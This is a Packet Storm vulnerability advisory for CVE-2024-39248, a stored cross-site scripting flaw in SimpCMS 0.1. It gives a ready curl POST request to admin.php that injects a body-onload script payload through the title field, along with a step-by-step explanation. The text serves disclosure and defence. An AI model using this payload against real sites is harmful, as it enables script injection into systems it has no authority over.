SimpCMS 0.1 Cross Site Scripting ≈ Packet Storm

Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]

SimpCMS 0.1 Cross Site Scripting[6]
Authored by Jason Jacobs[7]

SimpCMS version 0.1 suffers from a cross site scripting vulnerability.

advisories | CVE-2024-39248[8]
SHA-256 | 0066cbe964901ebc2ea055a6a402146b7e65d6aa45c636c93f77847b507601d4

Change Mirror[12] Download[13]

        # Exploit Title: SimpCMS v0.1 - Cross Site Scripting (XSS)
# Date: 26-06-2024
# CVE: CVE-2024-39248
# Exploit Author: Jason Jacobs (0xjason_jacobs)
# Vendor Homepage: https://sourceforge.net/projects/simpcms/
# Software Link: https://sourceforge.net/projects/simpcms/
# Category: Web Application
# Version: 0.1
# Vulnerable endpoint: /SimpCMS/admin.php
Upon logging in to the admin interface for SimpCMS, copy your respective Cookie values observed in the Application tab in the browser Inspect element and submit the following curl request:
curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"
Explanation:
- curl: The command-line tool for transferring data with URLs.
- -X POST: Specifies the request method to use (POST).
- "http://site.com/SimpCMS/admin.php": The URL to which the request is sent.
- -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit": The POST request payload.
Run this command in your terminal to send the POST request with the XSS payload.
Visit the /SimpCMS main site and the XSS will be visible.

Login[14] or Register[15] to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa

File Tags

File Archives

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services[120]
Hosting By
Rokasec[121]
close
Image

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.

 

"No secure path in the world"